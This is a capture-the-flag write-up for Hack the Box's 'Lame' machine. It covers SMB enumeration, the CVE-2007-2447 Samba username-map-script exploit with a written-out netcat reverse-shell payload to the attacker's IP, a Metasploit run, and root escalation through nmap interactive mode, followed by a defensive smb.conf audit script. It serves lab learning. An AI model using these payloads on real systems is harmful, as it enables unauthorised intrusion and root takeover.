Hack the Box Platform Challenge: Lame Write-up


This was one of the easiest machines to "pop". We will be using both the manual way and Kali's Metasploit.

Hostname: Lame, IP: 10.10.10.3, OS: Linux.

Enumeration 1:

We begin with an nmap scan, which shows 4 open ports and the different services running on them.



Exploitation:

Our initial exploit vector is FTP on port 21, which is open and allows anonymous login. The FTP software running is vsftpd 2.3.4, but unfortunately there is nothing useful here.



Next we check whether anonymous login is allowed via SMB enumeration and whether we can list the shares that Samba exposes:



We find out that we might be able to access the tmp and opt shares, but before trying them we gather more information using enum4linux (enum4linux -a 10.10.10.3) and the nmap vuln scripts (nmap --script smb-vuln* 10.10.10.3 --script-args=unsafe=1 -p 445 10.10.10.3). We find the domain admin SID (S-1-5-21-2446995257-2525374255-2673161615-512), the local admin SID (S-1-5-21-2446995257-2525374255-2673161615-500 LAME\Administrator (Local User)) and that mapping is allowed on the tmp share.





Manual Exploitation:

I used the command smbclient //10.10.10.3/tmp to connect to LAME using smbclient. I also used the help command to see what commands I can run. I also started a nc listener on port 4444 and finally ran the payload logon "./=`nohup nc -e /bin/sh 10.10.14.20 4444`" and got a root shell and the root flag!!



Using Metasploit:

The nmap scan results showed LAME running the Samba service, Samba smbd 3.X, and smbd 3.0.20-Debian. Googling "smbd 3.X exploit", I found the "Samba 3.5.11/3.6.3 - Remote Code Execution" exploit on exploit-db, CVE-2007-2447 "Username map script".

On the Metasploit Framework, I used the "Username map script" exploit, set the rhost parameters and ran the script as in the picture below, and got a command shell as root!!
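As an added defensive check that is not part of the original write-up, the following Python audits an smb.conf for the conditions this box's SMB attack path relies on: a guest-writable share like tmp, a configured username map script, and a Samba version in the range affected by CVE-2007-2447. The two smb.conf fragments and the script path are constructed samples, and the affected range 3.0.0 through 3.0.25rc3 comes from the CVE advisory rather than from this page.

```python
import re
# Constructed sample smb.conf fragments; neither is taken from the target box.
WEAK_SMB_CONF = """
[global]
   username map script = /etc/samba/scripts/mapusers.sh
[tmp]
   writable = yes
   guest ok = yes
"""
HARDENED_SMB_CONF = """
[global]
   map to guest = Never
[tmp]
   writable = no
   guest ok = no
"""

def parse_smb_conf(text):
    """Parse smb.conf text into {section: {option: value}} (options lowercased)."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue  # skip blanks and comments
        if line.startswith("[") and line.endswith("]"):
            current = sections.setdefault(line[1:-1].strip().lower(), {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            current[" ".join(key.lower().split())] = value.strip()
    return sections

def version_vulnerable(version):
    """True for Samba 3.0.0 through 3.0.25rc3, the CVE-2007-2447 affected range."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)(rc\d+)?", version)
    if not m:
        return False
    key = tuple(int(x) for x in m.groups()[:3]) + (0 if m.group(4) else 1,)  # rc sorts below final
    return (3, 0, 0, 0) <= key < (3, 0, 25, 1)

def audit_smb_conf(text, version=None):
    """Return findings for this write-up's attack path ('read only = no' style synonyms not handled)."""
    findings, conf = [], parse_smb_conf(text)
    if "username map script" in conf.get("global", {}):
        findings.append("username map script is set (CVE-2007-2447 attack surface)")
    for name, opts in conf.items():
        if name != "global" and all(opts.get(k, "no").lower() == "yes" for k in ("guest ok", "writable")):
            findings.append(f"share [{name}] is anonymously writable")
    if version and version_vulnerable(version):
        findings.append(f"Samba {version} is in the CVE-2007-2447 affected range")
    return findings
```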





Extra:

Root can also be achieved by escalating privileges using nmap's interactive mode:

sh-3.2$ id
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
sh-3.2$ nmap --interactive
nmap --interactive
Starting Nmap V. 4.53 ( http://insecure.org )
Welcome to Interactive Mode -- press h for help
nmap> !sh
!sh
sh-3.2# id
id
uid=1(daemon) gid=1(daemon) euid=0(root) groups=1(daemon)
